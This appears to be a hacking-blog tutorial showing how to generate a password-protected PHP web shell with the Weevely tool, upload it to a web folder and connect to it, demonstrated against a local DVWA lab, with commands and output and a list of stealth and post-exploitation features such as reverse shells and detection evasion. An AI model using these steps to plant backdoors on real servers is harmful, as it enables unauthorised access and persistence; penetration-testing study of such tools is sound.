Welcome back, Hackers! Today we’re going to create simple PHP Web Shell and Backdoor using Weevely. Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.
Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environment.
Let’s get started!
Weevely php stealth web shell and backdoor has more than 30 modules available for post exploitation tasks.
The framework features:
- Ssh-like terminal
- SQL console pivoted on target
- HTTP proxy pivoted on target
- Host configuration security auditing
- Mount of the remote filesystem
- Network scan pivoted on target
- File upload and download
- Reverse and direct TCP shell
- Meterpreter support
- Service account bruteforce
- Compressed archive management
Weevely php stealth web shell and backdoor communications are hidden, every communications between server and client are hidden in HTTP Cookies. Communications between client and server are obfuscated to bypass NIDS signature detection.
Things you need:
- Weevely https://github.com/epinna/weevely3
- Web Server (I’m using DVWA)
Generate the backdoor agent
Weevely client communicates to the PHP agent installed into the target. Move to the
weevely3/folder and run
./weevely.py to print help or just simply type weevely in your terminal.
[+] weevely 3.2.0
[!] Error: too few arguments
[+] Run terminal to the target
weevely <URL> <password> [cmd]
[+] Load session file
weevely session <path> [cmd]
[+] Generate backdoor agent
weevely generate <password> <path>
To generate a new agent, just use the
generate option passing the password and path arguments.
root@TheHackerToday:~# weevely generate 123 /root/Desktop/backdoor.php
Generated backdoor with password '123' in '/root/Desktop/backdoor.php' of 1476 byte size.
Then, upload the generated agent under the target web folder. Make sure that the agent PHP script is properly exposed and executable through the web server.
Connect to the agent
Launch weevely script to connect to the remote agent.
root@TheHackerToday:~# weevely http://localhost/backdoor.php 123
The first prompt weevely> is still not connected to allow users to set any useful pre-connection option e.g. set proxies to be used. Running a real command starts automatically the session on the remote target.
weevely> uname -a
Linux TheHackerToday 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux